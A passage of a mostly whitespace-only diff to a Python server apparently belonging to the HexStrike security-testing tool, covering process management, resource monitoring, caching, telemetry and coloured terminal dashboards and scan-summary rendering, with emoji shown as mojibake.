"force_killed" 
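# Escalation order: Popen.terminate() sends SIGTERM on POSIX (a catchable
# shutdown request), and only after the grace period does Popen.kill() send
# the untrappable SIGKILL, so a child that ignores SIGTERM is still reaped.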
logger.warning(f"โš ๏ธ Process {pid} force killed after timeout") return True - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error terminating process {pid}: {str(e)}") return False - + def _monitor_system(self): """Monitor system resources and auto-scale""" while True: try: time.sleep(15) # Monitor every 15 seconds - + # Get current resource usage resource_usage = self.resource_monitor.get_current_usage() - + # Auto-scaling based on resource usage if self.auto_scaling_enabled: self._auto_scale_based_on_resources(resource_usage) - + # Update performance dashboard self.performance_dashboard.update_system_metrics(resource_usage) - + except Exception as e: logger.error(f"๐Ÿ’ฅ System monitoring error: {str(e)}") - + def _auto_scale_based_on_resources(self, resource_usage: Dict[str, float]): """Auto-scale process pool based on resource usage""" pool_stats = self.process_pool.get_pool_stats() current_workers = pool_stats["active_workers"] - + # Scale down if resources are constrained if (resource_usage["cpu_percent"] > self.resource_thresholds["cpu_high"] or resource_usage["memory_percent"] > self.resource_thresholds["memory_high"]): - + if current_workers > self.process_pool.min_workers: self.process_pool._scale_down(1) logger.info(f"๐Ÿ“‰ Auto-scaled down due to high resource usage: CPU {resource_usage['cpu_percent']:.1f}%, Memory {resource_usage['memory_percent']:.1f}%") - + # Scale up if resources are available and there's demand - elif (resource_usage["cpu_percent"] < 60 and + elif (resource_usage["cpu_percent"] < 60 and resource_usage["memory_percent"] < 70 and pool_stats["queue_size"] > 2): - + if current_workers < self.process_pool.max_workers: self.process_pool._scale_up(1) logger.info(f"๐Ÿ“ˆ Auto-scaled up due to available resources and demand") - + def get_comprehensive_stats(self) -> Dict[str, Any]: """Get comprehensive system and process statistics""" return { @@ -5422,12 +5422,12 @@ class EnhancedProcessManager: class ResourceMonitor: """Advanced resource monitoring with historical tracking""" - + def __init__(self, history_size=100): self.history_size = history_size self.usage_history = [] self.history_lock = threading.Lock() - + def get_current_usage(self) -> Dict[str, float]: """Get current system resource usage""" try: @@ -5435,7 +5435,7 @@ class ResourceMonitor: memory = psutil.virtual_memory() disk = psutil.disk_usage('/') network = psutil.net_io_counters() - + usage = { "cpu_percent": cpu_percent, "memory_percent": memory.percent, @@ -5446,15 +5446,15 @@ class ResourceMonitor: "network_bytes_recv": network.bytes_recv, "timestamp": time.time() } - + # Add to history with self.history_lock: self.usage_history.append(usage) if len(self.usage_history) > self.history_size: self.usage_history.pop(0) - + return usage - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting resource usage: {str(e)}") return { @@ -5467,7 +5467,7 @@ class ResourceMonitor: "network_bytes_recv": 0, "timestamp": time.time() } - + def get_process_usage(self, pid: int) -> Dict[str, Any]: """Get resource usage for specific process""" try: @@ -5481,18 +5481,18 @@ class ResourceMonitor: } except (psutil.NoSuchProcess, psutil.AccessDenied): return {} - + def get_usage_trends(self) -> Dict[str, Any]: """Get resource usage trends""" with self.history_lock: if len(self.usage_history) < 2: return {} - + recent = self.usage_history[-10:] # Last 10 measurements - + cpu_trend = sum(u["cpu_percent"] for u in recent) / len(recent) memory_trend = sum(u["memory_percent"] for u in recent) / len(recent) - + return { 
"cpu_avg_10": cpu_trend, "memory_avg_10": memory_trend, @@ -5502,13 +5502,13 @@ class ResourceMonitor: class PerformanceDashboard: """Real-time performance monitoring dashboard""" - + def __init__(self): self.execution_history = [] self.system_metrics = [] self.dashboard_lock = threading.Lock() self.max_history = 1000 - + def record_execution(self, command: str, result: Dict[str, Any]): """Record command execution for performance tracking""" with self.dashboard_lock: @@ -5519,30 +5519,30 @@ class PerformanceDashboard: "return_code": result.get("return_code", -1), "timestamp": time.time() } - + self.execution_history.append(execution_record) if len(self.execution_history) > self.max_history: self.execution_history.pop(0) - + def update_system_metrics(self, metrics: Dict[str, Any]): """Update system metrics for dashboard""" with self.dashboard_lock: self.system_metrics.append(metrics) if len(self.system_metrics) > self.max_history: self.system_metrics.pop(0) - + def get_summary(self) -> Dict[str, Any]: """Get performance summary""" with self.dashboard_lock: if not self.execution_history: return {"executions": 0} - + recent_executions = self.execution_history[-100:] # Last 100 executions - + total_executions = len(recent_executions) successful_executions = sum(1 for e in recent_executions if e["success"]) avg_execution_time = sum(e["execution_time"] for e in recent_executions) / total_executions - + return { "total_executions": len(self.execution_history), "recent_executions": total_executions, @@ -5575,7 +5575,7 @@ process_lock = threading.Lock() class ProcessManager: """Enhanced process manager for command termination and monitoring""" - + @staticmethod def register_process(pid, command, process_obj): """Register a new active process""" @@ -5591,7 +5591,7 @@ class ProcessManager: "bytes_processed": 0 } logger.info(f"๐Ÿ†” REGISTERED: Process {pid} - {command[:50]}...") - + @staticmethod def update_process_progress(pid, progress, last_output="", bytes_processed=0): """Update process progress and stats""" @@ -5601,15 +5601,15 @@ class ProcessManager: active_processes[pid]["last_output"] = last_output active_processes[pid]["bytes_processed"] = bytes_processed runtime = time.time() - active_processes[pid]["start_time"] - + # Calculate ETA if progress > 0 eta = 0 if progress > 0: eta = (runtime / progress) * (1.0 - progress) - + active_processes[pid]["runtime"] = runtime active_processes[pid]["eta"] = eta - + @staticmethod def terminate_process(pid): """Terminate a specific process""" @@ -5623,7 +5623,7 @@ class ProcessManager: time.sleep(1) # Give it a chance to terminate gracefully if process_obj.poll() is None: process_obj.kill() # Force kill if still running - + active_processes[pid]["status"] = "terminated" logger.warning(f"๐Ÿ›‘ TERMINATED: Process {pid} - {process_info['command'][:50]}...") return True @@ -5631,7 +5631,7 @@ class ProcessManager: logger.error(f"๐Ÿ’ฅ Error terminating process {pid}: {str(e)}") return False return False - + @staticmethod def cleanup_process(pid): """Remove process from active registry""" @@ -5641,19 +5641,19 @@ class ProcessManager: logger.info(f"๐Ÿงน CLEANUP: Process {pid} removed from registry") return process_info return None - + @staticmethod def get_process_status(pid): """Get status of a specific process""" with process_lock: return active_processes.get(pid, None) - + @staticmethod def list_active_processes(): """List all active processes""" with process_lock: return dict(active_processes) - + @staticmethod def pause_process(pid): """Pause a specific 
process (SIGSTOP)""" @@ -5669,7 +5669,7 @@ class ProcessManager: except Exception as e: logger.error(f"๐Ÿ’ฅ Error pausing process {pid}: {str(e)}") return False - + @staticmethod def resume_process(pid): """Resume a paused process (SIGCONT)""" @@ -5694,7 +5694,7 @@ class ProcessManager: BG_MAGENTA = '\033[45m' BG_CYAN = '\033[46m' BG_WHITE = '\033[47m' - + # Text effects DIM = '\033[2m' UNDERLINE = '\033[4m' @@ -5704,11 +5704,11 @@ class ProcessManager: class PythonEnvironmentManager: """Manage Python virtual environments and dependencies""" - + def __init__(self, base_dir: str = "/tmp/hexstrike_envs"): self.base_dir = Path(base_dir) self.base_dir.mkdir(exist_ok=True) - + def create_venv(self, env_name: str) -> Path: """Create a new virtual environment""" env_path = self.base_dir / env_name @@ -5716,14 +5716,14 @@ class PythonEnvironmentManager: logger.info(f"๐Ÿ Creating virtual environment: {env_name}") venv.create(env_path, with_pip=True) return env_path - + def install_package(self, env_name: str, package: str) -> bool: """Install a package in the specified environment""" env_path = self.create_venv(env_name) pip_path = env_path / "bin" / "pip" - + try: - result = subprocess.run([str(pip_path), "install", package], + result = subprocess.run([str(pip_path), "install", package], capture_output=True, text=True, timeout=300) if result.returncode == 0: logger.info(f"๐Ÿ“ฆ Installed package {package} in {env_name}") @@ -5734,7 +5734,7 @@ class PythonEnvironmentManager: except Exception as e: logger.error(f"๐Ÿ’ฅ Error installing package {package}: {e}") return False - + def get_python_path(self, env_name: str) -> str: """Get Python executable path for environment""" env_path = self.create_venv(env_name) @@ -5749,29 +5749,29 @@ env_manager = PythonEnvironmentManager() class CVEIntelligenceManager: """Advanced CVE Intelligence and Vulnerability Management System""" - + def __init__(self): self.cve_cache = {} self.vulnerability_db = {} self.threat_intelligence = {} - + @staticmethod def create_banner(): """Reuse unified ModernVisualEngine banner (legacy hook).""" return ModernVisualEngine.create_banner() - + @staticmethod - def render_progress_bar(progress: float, width: int = 40, style: str = 'cyber', + def render_progress_bar(progress: float, width: int = 40, style: str = 'cyber', label: str = "", eta: float = 0, speed: str = "") -> str: """Render a beautiful progress bar with multiple styles""" - + # Clamp progress between 0 and 1 progress = max(0.0, min(1.0, progress)) - + # Calculate filled and empty portions filled_width = int(width * progress) empty_width = width - filled_width - + # Style-specific rendering if style == 'cyber': filled_char = 'โ–ˆ'; empty_char = 'โ–‘' @@ -5789,47 +5789,47 @@ class CVEIntelligenceManager: filled_char = 'โ–ˆ'; empty_char = 'โ–‘' bar_color = ModernVisualEngine.COLORS['ACCENT_LINE'] progress_color = ModernVisualEngine.COLORS['PRIMARY_BORDER'] - + # Build the progress bar filled_part = bar_color + filled_char * filled_width empty_part = ModernVisualEngine.COLORS['TERMINAL_GRAY'] + empty_char * empty_width percentage = f"{progress * 100:.1f}%" - + # Add ETA and speed if provided eta_str = f" | ETA: {eta:.0f}s" if eta > 0 else "" speed_str = f" | {speed}" if speed else "" - + # Construct the full progress bar bar = f"{progress_color}[{filled_part}{empty_part}{ModernVisualEngine.COLORS['RESET']}{progress_color}] {percentage}{eta_str}{speed_str}{ModernVisualEngine.COLORS['RESET']}" - + if label: return 
f"{ModernVisualEngine.COLORS['BOLD']}{label}{ModernVisualEngine.COLORS['RESET']} {bar}" return bar - + @staticmethod def render_vulnerability_card(vuln_data: Dict[str, Any]) -> str: """Render vulnerability as a beautiful card with severity indicators""" - + severity = vuln_data.get('severity', 'info').lower() title = vuln_data.get('title', 'Unknown Vulnerability') url = vuln_data.get('url', 'N/A') description = vuln_data.get('description', 'No description available') cvss = vuln_data.get('cvss_score', 0.0) - + # Get severity color severity_color = ModernVisualEngine.COLORS['HACKER_RED'] if severity == 'critical' else ModernVisualEngine.COLORS['HACKER_RED'] if severity == 'high' else ModernVisualEngine.COLORS['CYBER_ORANGE'] if severity == 'medium' else ModernVisualEngine.COLORS['CYBER_ORANGE'] if severity == 'low' else ModernVisualEngine.COLORS['NEON_BLUE'] - + # Severity indicators severity_indicators = { 'critical': '๐Ÿ”ฅ CRITICAL', 'high': 'โš ๏ธ HIGH', - 'medium': '๐Ÿ“Š MEDIUM', + 'medium': '๐Ÿ“Š MEDIUM', 'low': '๐Ÿ“ LOW', 'info': 'โ„น๏ธ INFO' } - + severity_badge = severity_indicators.get(severity, 'โ“ UNKNOWN') - + # Create the vulnerability card card = f""" {ModernVisualEngine.COLORS['BOLD']}โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ{ModernVisualEngine.COLORS['RESET']} @@ -5842,27 +5842,27 @@ class CVEIntelligenceManager: {ModernVisualEngine.COLORS['BOLD']}โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']} """ return card - + @staticmethod def create_live_dashboard(processes: Dict[int, Dict[str, Any]]) -> str: """Create a live dashboard showing all active processes""" - + if not processes: return f"{ModernVisualEngine.COLORS['TERMINAL_GRAY']}๐Ÿ“Š No active processes{ModernVisualEngine.COLORS['RESET']}" - + dashboard = f""" {ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•— โ•‘ ๐Ÿš€ LIVE PROCESS DASHBOARD โ•‘ โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ{ModernVisualEngine.COLORS['RESET']} """ - + for pid, proc_info in processes.items(): command = proc_info.get('command', 'Unknown')[:50] status = proc_info.get('status', 'unknown') progress = proc_info.get('progress', 0.0) runtime = proc_info.get('runtime', 0) eta = proc_info.get('eta', 0) - + # Status color coding status_colors = { 'running': ModernVisualEngine.COLORS['MATRIX_GREEN'], @@ -5871,39 +5871,39 @@ class CVEIntelligenceManager: 'completed': ModernVisualEngine.COLORS['NEON_BLUE'] } status_color = status_colors.get(status, ModernVisualEngine.COLORS['BRIGHT_WHITE']) - + # Create mini progress bar mini_bar = ModernVisualEngine.render_progress_bar( progress, width=20, style='cyber', eta=eta ) - + dashboard += 
f"""{ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['NEON_BLUE']}PID {pid}{ModernVisualEngine.COLORS['RESET']} โ”‚ {status_color}{status.upper()}{ModernVisualEngine.COLORS['RESET']} โ”‚ {runtime:.1f}s โ”‚ {command}... {ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {mini_bar} {ModernVisualEngine.COLORS['BOLD']}โ• โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฃ{ModernVisualEngine.COLORS['RESET']} """ - + dashboard += f"{ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•{ModernVisualEngine.COLORS['RESET']}" - + return dashboard - + @staticmethod def format_tool_output(tool: str, output: str, success: bool = True) -> str: """Format tool output with syntax highlighting and structure""" - + # Get tool icon tool_icon = '๐Ÿ› ๏ธ' # Default tool icon - + # Status indicator status_icon = "โœ…" if success else "โŒ" status_color = ModernVisualEngine.COLORS['MATRIX_GREEN'] if success else ModernVisualEngine.COLORS['HACKER_RED'] - + # Format the output with structure formatted_output = f""" {ModernVisualEngine.COLORS['BOLD']}โ•ญโ”€ {tool_icon} {tool.upper()} OUTPUT โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {status_color}{status_icon} Status: {'SUCCESS' if success else 'FAILED'}{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['BOLD']}โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค{ModernVisualEngine.COLORS['RESET']} """ - + # Process output lines with syntax highlighting lines = output.split('\n') for line in lines[:20]: # Limit to first 20 lines for readability @@ -5917,24 +5917,24 @@ class CVEIntelligenceManager: formatted_output += f"{ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['WARNING']}{line[:75]}{ModernVisualEngine.COLORS['RESET']}\n" else: formatted_output += f"{ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['BRIGHT_WHITE']}{line[:75]}{ModernVisualEngine.COLORS['RESET']}\n" - + if len(lines) > 20: formatted_output += f"{ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['TERMINAL_GRAY']}... 
({len(lines) - 20} more lines truncated){ModernVisualEngine.COLORS['RESET']}\n" - + formatted_output += f"{ModernVisualEngine.COLORS['BOLD']}โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']}" - + return formatted_output - + @staticmethod def create_summary_report(results: Dict[str, Any]) -> str: """Generate a beautiful summary report""" - + total_vulns = len(results.get('vulnerabilities', [])) critical_vulns = len([v for v in results.get('vulnerabilities', []) if v.get('severity') == 'critical']) high_vulns = len([v for v in results.get('vulnerabilities', []) if v.get('severity') == 'high']) execution_time = results.get('execution_time', 0) tools_used = results.get('tools_used', []) - + report = f""" {ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•— โ•‘ ๐Ÿ“Š SCAN SUMMARY REPORT โ•‘ @@ -5944,7 +5944,7 @@ class CVEIntelligenceManager: {ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['WARNING']}๐Ÿ› ๏ธ Tools Used:{ModernVisualEngine.COLORS['RESET']} {len(tools_used)} tools {ModernVisualEngine.COLORS['BOLD']}โ• โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฃ{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['HACKER_RED']}๐Ÿ”ฅ Critical:{ModernVisualEngine.COLORS['RESET']} {critical_vulns} vulnerabilities -{ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['ERROR']}โš ๏ธ High:{ModernVisualEngine.COLORS['RESET']} {high_vulns} vulnerabilities +{ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['ERROR']}โš ๏ธ High:{ModernVisualEngine.COLORS['RESET']} {high_vulns} vulnerabilities {ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['MATRIX_GREEN']}๐Ÿ“ˆ Total Found:{ModernVisualEngine.COLORS['RESET']} {total_vulns} vulnerabilities {ModernVisualEngine.COLORS['BOLD']}โ• โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฃ{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['ELECTRIC_PURPLE']}๐Ÿš€ Tools:{ModernVisualEngine.COLORS['RESET']} {', '.join(tools_used[:5])}{'...' 
if len(tools_used) > 5 else ''} @@ -5955,7 +5955,7 @@ class CVEIntelligenceManager: # Configure enhanced logging with colors class ColoredFormatter(logging.Formatter): """Custom formatter with colors and emojis""" - + COLORS = { 'DEBUG': ModernVisualEngine.COLORS['DEBUG'], 'INFO': ModernVisualEngine.COLORS['SUCCESS'], @@ -5963,7 +5963,7 @@ class ColoredFormatter(logging.Formatter): 'ERROR': ModernVisualEngine.COLORS['ERROR'], 'CRITICAL': ModernVisualEngine.COLORS['CRITICAL'] } - + EMOJIS = { 'DEBUG': '๐Ÿ”', 'INFO': 'โœ…', @@ -5971,11 +5971,11 @@ class ColoredFormatter(logging.Formatter): 'ERROR': 'โŒ', 'CRITICAL': '๐Ÿ”ฅ' } - + def format(self, record): emoji = self.EMOJIS.get(record.levelname, '๐Ÿ“') color = self.COLORS.get(record.levelname, ModernVisualEngine.COLORS['BRIGHT_WHITE']) - + # Add color and emoji to the message record.msg = f"{color}{emoji} {record.msg}{ModernVisualEngine.COLORS['RESET']}" return super().format(record) @@ -5985,11 +5985,11 @@ def setup_logging(): """Setup enhanced logging with colors and formatting""" logger = logging.getLogger() logger.setLevel(logging.INFO) - + # Clear existing handlers for handler in logger.handlers[:]: logger.removeHandler(handler) - + # Console handler with colors console_handler = logging.StreamHandler(sys.stdout) console_handler.setFormatter(ColoredFormatter( @@ -5997,7 +5997,7 @@ def setup_logging(): datefmt="%Y-%m-%d %H:%M:%S" )) logger.addHandler(console_handler) - + return logger # Configuration (using existing API_PORT from top of file) @@ -6008,26 +6008,26 @@ CACHE_TTL = 3600 # 1 hour class HexStrikeCache: """Advanced caching system for command results""" - + def __init__(self, max_size: int = CACHE_SIZE, ttl: int = CACHE_TTL): self.cache = OrderedDict() self.max_size = max_size self.ttl = ttl self.stats = {"hits": 0, "misses": 0, "evictions": 0} - + def _generate_key(self, command: str, params: Dict[str, Any]) -> str: """Generate cache key from command and parameters""" key_data = f"{command}:{json.dumps(params, sort_keys=True)}" return hashlib.md5(key_data.encode()).hexdigest() - + def _is_expired(self, timestamp: float) -> bool: """Check if cache entry is expired""" return time.time() - timestamp > self.ttl - + def get(self, command: str, params: Dict[str, Any]) -> Optional[Dict[str, Any]]: """Get cached result if available and not expired""" key = self._generate_key(command, params) - + if key in self.cache: timestamp, data = self.cache[key] if not self._is_expired(timestamp): @@ -6039,29 +6039,29 @@ class HexStrikeCache: else: # Remove expired entry del self.cache[key] - + self.stats["misses"] += 1 logger.info(f"๐Ÿ” Cache MISS for command: {command}") return None - + def set(self, command: str, params: Dict[str, Any], result: Dict[str, Any]): """Store result in cache""" key = self._generate_key(command, params) - + # Remove oldest entries if cache is full while len(self.cache) >= self.max_size: oldest_key = next(iter(self.cache)) del self.cache[oldest_key] self.stats["evictions"] += 1 - + self.cache[key] = (time.time(), result) logger.info(f"๐Ÿ’พ Cached result for command: {command}") - + def get_stats(self) -> Dict[str, Any]: """Get cache statistics""" total_requests = self.stats["hits"] + self.stats["misses"] hit_rate = (self.stats["hits"] / total_requests * 100) if total_requests > 0 else 0 - + return { "size": len(self.cache), "max_size": self.max_size, @@ -6076,7 +6076,7 @@ cache = HexStrikeCache() class TelemetryCollector: """Collect and manage system telemetry""" - + def __init__(self): self.stats = { 
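# Raw lifetime tallies for this server instance; get_stats() derives
# success_rate and avg_execution_time from these counters on demand.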
"commands_executed": 0, @@ -6085,7 +6085,7 @@ class TelemetryCollector: "total_execution_time": 0.0, "start_time": time.time() } - + def record_execution(self, success: bool, execution_time: float): """Record command execution statistics""" self.stats["commands_executed"] += 1 @@ -6094,7 +6094,7 @@ class TelemetryCollector: else: self.stats["failed_commands"] += 1 self.stats["total_execution_time"] += execution_time - + def get_system_metrics(self) -> Dict[str, Any]: """Get current system metrics""" return { @@ -6103,13 +6103,13 @@ class TelemetryCollector: "disk_usage": psutil.disk_usage('/').percent, "network_io": psutil.net_io_counters()._asdict() if psutil.net_io_counters() else {} } - + def get_stats(self) -> Dict[str, Any]: """Get telemetry statistics""" uptime = time.time() - self.stats["start_time"] success_rate = (self.stats["successful_commands"] / self.stats["commands_executed"] * 100) if self.stats["commands_executed"] > 0 else 0 avg_execution_time = (self.stats["total_execution_time"] / self.stats["commands_executed"]) if self.stats["commands_executed"] > 0 else 0 - + return { "uptime_seconds": uptime, "commands_executed": self.stats["commands_executed"], @@ -6123,7 +6123,7 @@ telemetry = TelemetryCollector() class EnhancedCommandExecutor: """Enhanced command executor with caching, progress tracking, and better output handling""" - + def __init__(self, command: str, timeout: int = COMMAND_TIMEOUT): self.command = command self.timeout = timeout @@ -6136,7 +6136,7 @@ class EnhancedCommandExecutor: self.timed_out = False self.start_time = None self.end_time = None - + def _read_stdout(self): """Thread function to continuously read and display stdout""" try: @@ -6147,7 +6147,7 @@ class EnhancedCommandExecutor: logger.info(f"๐Ÿ“ค STDOUT: {line.strip()}") except Exception as e: logger.error(f"Error reading stdout: {e}") - + def _read_stderr(self): """Thread function to continuously read and display stderr""" try: @@ -6158,7 +6158,7 @@ class EnhancedCommandExecutor: logger.warning(f"๐Ÿ“ฅ STDERR: {line.strip()}") except Exception as e: logger.error(f"Error reading stderr: {e}") - + def _show_progress(self, duration: float): """Show enhanced progress indication for long-running commands""" if duration > 2: # Show progress for commands taking more than 2 seconds @@ -6168,20 +6168,20 @@ class EnhancedCommandExecutor: while self.process and self.process.poll() is None: elapsed = time.time() - start char = progress_chars[i % len(progress_chars)] - + # Calculate progress percentage (rough estimate) progress_percent = min((elapsed / self.timeout) * 100, 99.9) progress_fraction = progress_percent / 100 - + # Calculate ETA eta = 0 if progress_percent > 5: # Only show ETA after 5% progress eta = ((elapsed / progress_percent) * 100) - elapsed - + # Calculate speed bytes_processed = len(self.stdout_data) + len(self.stderr_data) speed = f"{bytes_processed/elapsed:.0f} B/s" if elapsed > 0 else "0 B/s" - + # Update process manager with progress ProcessManager.update_process_progress( self.process.pid, @@ -6189,30 +6189,30 @@ class EnhancedCommandExecutor: f"Running for {elapsed:.1f}s", bytes_processed ) - + # Create beautiful progress bar using ModernVisualEngine progress_bar = ModernVisualEngine.render_progress_bar( - progress_fraction, - width=30, + progress_fraction, + width=30, style='cyber', label=f"โšก PROGRESS {char}", eta=eta, speed=speed ) - + logger.info(f"{progress_bar} | {elapsed:.1f}s | PID: {self.process.pid}") time.sleep(0.8) i += 1 if elapsed > self.timeout: break - + def 
